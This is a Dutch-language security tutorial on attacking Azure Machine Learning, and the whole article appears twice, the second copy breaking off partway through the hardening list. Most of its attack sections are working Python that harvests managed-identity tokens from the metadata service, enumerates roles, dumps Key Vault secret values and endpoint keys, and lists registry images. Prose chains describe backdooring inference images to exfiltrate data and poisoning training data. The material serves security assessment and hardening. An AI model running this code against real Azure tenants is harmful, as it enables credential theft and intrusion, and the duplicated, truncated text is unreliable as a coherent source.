Azure ML-aanvalsoppervlak

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Azure Machine Learning -- misbruik van managed identity, workspace-beveiliging, aanvallen op compute-instances en endpoint-kwetsbaarheden.

azure azure-ml cloud ml-platform

Azure ML-architectuur

Azure Machine Learning organiseert resources rond workspaces. Elke workspace verbindt met Azure Storage, Key Vault, Container Registry en Application Insights.

Kaart van het aanvalsoppervlak

Component	Identiteit	Opslag	Netwerkblootstelling
Compute-instances	Managed Identity/User	Workspace-opslag	VNet optioneel
Online-endpoints	Managed Identity	Model in ACR/Blob	Internetgericht
Batch-endpoints	Managed Identity	Blob input/output	VNet optioneel
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob-artefacten	Workspace VNet

Azure ML-compute-instances krijgen managed identities toegewezen (system-assigned of user-assigned) die zich authenticeren bij Azure-services zonder credentials op te slaan. Wanneer deze identiteiten overgeprivilegieerd zijn -- een veelvoorkomende misconfiguratie omdat ML-workflows veel services raken -- geeft het compromitteren van een compute-instance brede toegang over het hele Azure-abonnement.

De Instance Metadata Service (IMDS) op 169.254.169.254 is de primaire tokenbron. Anders dan AWS IMDSv2 vereist Azure IMDS geen PUT-gebaseerde tokenuitwisseling, waardoor het oogsten van credentials eenvoudig is vanuit elke code die op de instance draait.

import requests
 
# Vanuit een Azure ML-compute-instance
# Verkrijg een token voor de managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Gebruik het token om Azure-resources te inventariseren
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Laterale beweging via managed identity

Zodra je een token hebt, inventariseer je wat de managed identity kan bereiken. Veelvoorkomende patronen van overprivilegering zijn onder meer Contributor-toegang op resourcegroepniveau (wat toegang geeft tot alle gelijkwaardige resources), Storage Blob Data Contributor op opslagaccounts met niet-ML-data, en Key Vault Secrets Officer over meerdere vaults.

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """Inventariseer alle role assignments voor de huidige identiteit."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Verkrijg een managed-identity-token gericht op een specifieke resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Verkrijg tokens voor verschillende Azure-services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Inventarisatie van workspace-datastores

Azure ML-workspaces verbinden met meerdere datastores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database en Azure Database for PostgreSQL. Elke datastore-registratie slaat verbindingsdetails en credentials op die geëxtraheerd kunnen worden.

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Lijst alle datastores op
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# Lijst geregistreerde modellen op
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Diepgaande datastore-inspectie

Naast het opsommen van datastores extraheer je hun verbindingscredentials en onderzoek je welke data toegankelijk is. Datastores die accountsleutels gebruiken (in plaats van managed-identity-passthrough) slaan die sleutels op in de Key Vault van de workspace.

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Verkrijg gedetailleerde datastore-info inclusief het credentialtype
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
 
    # Controleer credentialtype -- account_key vs identity-gebaseerd
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
 
    # Probeer bij blob-datastores de inhoud op te sommen
    if detail.type == "azure_blob":
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print(f"  Sample contents:")
        for blob in container.list_blobs(results_per_page=5):
            print(f"    {blob.name} ({blob.size} bytes)")
 
# Inventariseer environments (containerimages gebruikt voor training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")
 
# Lijst compute targets op -- mogelijke pivotpunten
for compute in ml_client.compute.list():
    print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")

3. Endpoint-authenticatie testen

Azure ML-online-endpoints ondersteunen twee authenticatiemodi: key-based (een statische API-sleutel) en Azure AD-token-based. Misconfiguraties zijn onder meer endpoints die zijn uitgerold met authenticatie uitgeschakeld, sleutels die nooit worden geroteerd, of te ruime CORS-policies.

import requests
 
# Test of het endpoint authenticatie vereist
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
 
# Probeer ongeauthenticeerde toegang
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
 
# Probeer met een gestolen/geraden sleutel
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Geavanceerd endpoint-onderzoek

import requests
import json
 
def probe_endpoint(endpoint_url, keys=None):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    results = {}
 
    # Test authenticatiemodi
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code
 
    # Test met OPTIONS om CORS te controleren
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
 
    # Test Swagger/OpenAPI-endpoint (vaak blootgesteld)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
 
    # Test health-endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code
 
    # Test op uitgebreide foutmeldingen (informatieblootstelling)
    malformed_resp = requests.post(
        endpoint_url,
        data="not json",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {keys[0]}" if keys else ""}
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
 
    return results
 
# Inventariseer alle endpoints en onderzoek elk
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Verkrijg endpoint-sleutels bij key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Extractie van Key Vault-secrets

Elke Azure ML-workspace maakt een bijbehorende Azure Key Vault aan. Deze vault slaat datastore-credentials, API-sleutels, aangepaste secrets ingesteld door datawetenschappers, en connection strings op. De managed identity van de workspace heeft doorgaans brede toegang tot deze vault, waardoor het een waardevol doelwit is na een initiële compute-compromittering.

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML-workspaces hebben een bijbehorende Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# Lijst en lees secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Uitgebreide Key Vault-inventarisatie

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Inventariseer secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categoriseer op naamgevingsconventie
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Inventariseer keys (gebruikt voor encryptie, ondertekening)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
    print(f"  {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
 
# Inventariseer certificaten
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Misbruik van de Container Registry

Azure ML-workspaces gebruiken Azure Container Registry (ACR) om Docker-images op te slaan voor trainings- en inference-omgevingen. Het compromitteren van ACR-toegang maakt supply-chain-aanvallen op modellen mogelijk -- het vervangen van legitieme inference-images door versies met een backdoor.

import requests
 
def enumerate_acr(acr_name, token):
    """Inventariseer repositories en images in Azure Container Registry."""
    acr_url = f"https://{acr_name}.azurecr.io"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Verkrijg een ACR-specifiek token via managed identity
    exchange_url = f"{acr_url}/oauth2/exchange"
    acr_token_resp = requests.post(exchange_url, data={
        "grant_type": "access_token",
        "service": f"{acr_name}.azurecr.io",
        "access_token": token
    })
    acr_token = acr_token_resp.json().get("refresh_token")
 
    # Lijst repositories op
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {acr_token}"}
    ).json()
 
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # Lijst tags op
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers={"Authorization": f"Bearer {acr_token}"}
        ).json()
        for tag in tags.get("tags", [])[:5]:
            print(f"  Tag: {tag}")
            # Verkrijg manifest voor image-analyse
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    "Authorization": f"Bearer {acr_token}",
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Beoordeling van netwerkisolatie

Azure ML ondersteunt VNet-integratie, maar veel implementaties gebruiken de standaardconfiguratie zonder netwerkisolatie. Zelfs wanneer VNet-integratie is ingeschakeld, creëren verkeerd geconfigureerde network security groups (NSG's) en ontbrekende private endpoints aanvalspaden.

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Beoordeel of een Azure ML-workspace correcte netwerkisolatie heeft."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Verkrijg workspace-details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Controleer op private-endpoint-verbindingen
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Beoordeel risico
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results

Checklist voor defensieve beoordeling

Verifieer bij het beoordelen van de Azure ML-beveiligingshouding deze controles:

Controlegebied	Wat te controleren	MITRE ATLAS-referentie
Identiteit	Scope van managed identity, conditional access-policies, RBAC-toewijzingen	AML.T0003 (ML Model Access)
Netwerk	VNet-integratie, private endpoints, NSG-regels, blootstelling van publieke endpoints	AML.T0002 (Active Scanning)
Data	Opslagencryptie, credentialtype van datastores, publieke blob-toegang	AML.T0008 (Collection)
Compute	Instance-isolatie, SSH-toegang, idle shutdown, patching	AML.T0004 (Full Model Access)
Registry	ACR-toegangscontroles, image-ondertekening, kwetsbaarheidsscanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault-toegangspolicies, secret-rotatie, soft-delete ingeschakeld	AML.TA0008 (Collection)
Monitoring	Diagnostische instellingen, Azure Sentinel-integratie, auditlogs	AML.TA0006 (Defense Evasion)

Aanbevolen hardening

Gebruik user-assigned managed identities met least-privilege RBAC in plaats van system-assigned identities met brede scope.
Schakel VNet-integratie in met private endpoints voor de workspace, opslagaccounts, Key Vault en ACR.
Zet publicNetworkAccess op Disabled voor alle workspace-resources.
Gebruik credential-passthrough voor datastores in plaats van accountsleutels op te slaan in Key Vault.
Schakel ACR content trust in en scan images op kwetsbaarheden voordat je ze uitrolt.
Forceer auth_mode: aad_token op endpoints in plaats van key-based authenticatie.
Schakel Azure Sentinel in met de diagnostische instellingen van de ML-workspace voor beveiligingsmonitoring.
Roteer endpoint-sleutels volgens een regelmatig schema en na elke vermoede compromittering.

Veelvoorkomende aanvalsketens

Echte Azure ML-engagements combineren doorgaans meerdere technieken. Hier zijn veelvoorkomende aanvalsketens, geordend op impact:

Keten 1: Van compute naar overname van het abonnement

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Keten 2: Supply-chain-aanval op modellen

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2

Keten 3: Manipulatie van de trainingspipeline

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint

MITRE ATLAS-mapping voor Azure ML-aanvallen

Aanvalstechniek	ATLAS-ID	Azure ML-specifieke context
IMDS managed-identity-tokenextractie	AML.TA0002 (Initial Access)	Workspace-MI met brede RBAC-scope
Datastore-inventarisatie	AML.T0000 (Search for Victim's Data)	Geregistreerde datastores onthullen alle verbonden opslag
Endpoint-onderzoek	AML.T0002 (Active Scanning)	Endpoints kunnen key-based auth gebruiken zonder rotatie
Modelextractie via endpoint	AML.T0024 (Model Extraction)	Online-endpoints die modelvoorspellingen leveren
ACR-image-manipulatie	AML.T0018 (Backdoor ML Model)	Vervang trainings-/inference-images in ACR
Key Vault laterale beweging	AML.TA0008 (Collection)	Workspace-Key Vault slaat cross-service-secrets op
Datavergiftiging van trainingsdata via blob	AML.T0020 (Data Poisoning)	Wijzig trainingsdata in verbonden blob-opslag

Cross-platform-vergelijking

Aanvalsvector	Azure ML	AWS SageMaker	GCP Vertex AI
Credentialbron	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primaire opslag	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Netwerkisolatie	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Grootste risico	Key Vault cross-service-blootstelling	IAM-role-overprivilegering	Service account `Editor`-rol

Gerelateerde onderwerpen

Cloud-AI-infrastructuur -- Cross-platform-overzicht
GCP Vertex AI -- GCP-vergelijking
AWS SageMaker -- AWS-vergelijking

Referenties

Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
"Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
"Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
"Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML

Knowledge Check

Wat maakt de Key Vault-integratie van Azure ML tot een belangrijk aanvalsoppervlak?

Azure ML-aanvalsoppervlak

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Azure Machine Learning -- misbruik van managed identity, workspace-beveiliging, aanvallen op compute-instances en endpoint-kwetsbaarheden.

azure azure-ml cloud ml-platform

Azure ML-architectuur

Azure Machine Learning organiseert resources rond workspaces. Elke workspace verbindt met Azure Storage, Key Vault, Container Registry en Application Insights.

Kaart van het aanvalsoppervlak

Component	Identiteit	Opslag	Netwerkblootstelling
Compute-instances	Managed Identity/User	Workspace-opslag	VNet optioneel
Online-endpoints	Managed Identity	Model in ACR/Blob	Internetgericht
Batch-endpoints	Managed Identity	Blob input/output	VNet optioneel
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob-artefacten	Workspace VNet

Aanvalstechnieken

1. Misbruik van managed identity

import requests
 
# Vanuit een Azure ML-compute-instance
# Verkrijg een token voor de managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Gebruik het token om Azure-resources te inventariseren
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Laterale beweging via managed identity

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """Inventariseer alle role assignments voor de huidige identiteit."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Verkrijg een managed-identity-token gericht op een specifieke resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Verkrijg tokens voor verschillende Azure-services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Inventarisatie van workspace-datastores

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Lijst alle datastores op
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# Lijst geregistreerde modellen op
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Diepgaande datastore-inspectie

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Verkrijg gedetailleerde datastore-info inclusief het credentialtype
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
 
    # Controleer credentialtype -- account_key vs identity-gebaseerd
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
 
    # Probeer bij blob-datastores de inhoud op te sommen
    if detail.type == "azure_blob":
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print(f"  Sample contents:")
        for blob in container.list_blobs(results_per_page=5):
            print(f"    {blob.name} ({blob.size} bytes)")
 
# Inventariseer environments (containerimages gebruikt voor training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")
 
# Lijst compute targets op -- mogelijke pivotpunten
for compute in ml_client.compute.list():
    print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")

3. Endpoint-authenticatie testen

import requests
 
# Test of het endpoint authenticatie vereist
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
 
# Probeer ongeauthenticeerde toegang
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
 
# Probeer met een gestolen/geraden sleutel
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Geavanceerd endpoint-onderzoek

import requests
import json
 
def probe_endpoint(endpoint_url, keys=None):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    results = {}
 
    # Test authenticatiemodi
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code
 
    # Test met OPTIONS om CORS te controleren
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
 
    # Test Swagger/OpenAPI-endpoint (vaak blootgesteld)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
 
    # Test health-endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code
 
    # Test op uitgebreide foutmeldingen (informatieblootstelling)
    malformed_resp = requests.post(
        endpoint_url,
        data="not json",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {keys[0]}" if keys else ""}
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
 
    return results
 
# Inventariseer alle endpoints en onderzoek elk
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Verkrijg endpoint-sleutels bij key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Extractie van Key Vault-secrets

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML-workspaces hebben een bijbehorende Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# Lijst en lees secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Uitgebreide Key Vault-inventarisatie

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Inventariseer secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categoriseer op naamgevingsconventie
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Inventariseer keys (gebruikt voor encryptie, ondertekening)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
    print(f"  {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
 
# Inventariseer certificaten
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Misbruik van de Container Registry

import requests
 
def enumerate_acr(acr_name, token):
    """Inventariseer repositories en images in Azure Container Registry."""
    acr_url = f"https://{acr_name}.azurecr.io"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Verkrijg een ACR-specifiek token via managed identity
    exchange_url = f"{acr_url}/oauth2/exchange"
    acr_token_resp = requests.post(exchange_url, data={
        "grant_type": "access_token",
        "service": f"{acr_name}.azurecr.io",
        "access_token": token
    })
    acr_token = acr_token_resp.json().get("refresh_token")
 
    # Lijst repositories op
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {acr_token}"}
    ).json()
 
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # Lijst tags op
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers={"Authorization": f"Bearer {acr_token}"}
        ).json()
        for tag in tags.get("tags", [])[:5]:
            print(f"  Tag: {tag}")
            # Verkrijg manifest voor image-analyse
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    "Authorization": f"Bearer {acr_token}",
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Beoordeling van netwerkisolatie

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Beoordeel of een Azure ML-workspace correcte netwerkisolatie heeft."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Verkrijg workspace-details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Controleer op private-endpoint-verbindingen
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Beoordeel risico
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results

Checklist voor defensieve beoordeling

Verifieer bij het beoordelen van de Azure ML-beveiligingshouding deze controles:

Controlegebied	Wat te controleren	MITRE ATLAS-referentie
Identiteit	Scope van managed identity, conditional access-policies, RBAC-toewijzingen	AML.T0003 (ML Model Access)
Netwerk	VNet-integratie, private endpoints, NSG-regels, blootstelling van publieke endpoints	AML.T0002 (Active Scanning)
Data	Opslagencryptie, credentialtype van datastores, publieke blob-toegang	AML.T0008 (Collection)
Compute	Instance-isolatie, SSH-toegang, idle shutdown, patching	AML.T0004 (Full Model Access)
Registry	ACR-toegangscontroles, image-ondertekening, kwetsbaarheidsscanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault-toegangspolicies, secret-rotatie, soft-delete ingeschakeld	AML.TA0008 (Collection)
Monitoring	Diagnostische instellingen, Azure Sentinel-integratie, auditlogs	AML.TA0006 (Defense Evasion)

Aanbevolen hardening

Gebruik user-assigned managed identities met least-privilege RBAC in plaats van system-assigned identities met brede scope.
Schakel VNet-integratie in met private endpoints voor de workspace, opslagaccounts, Key Vault en ACR.
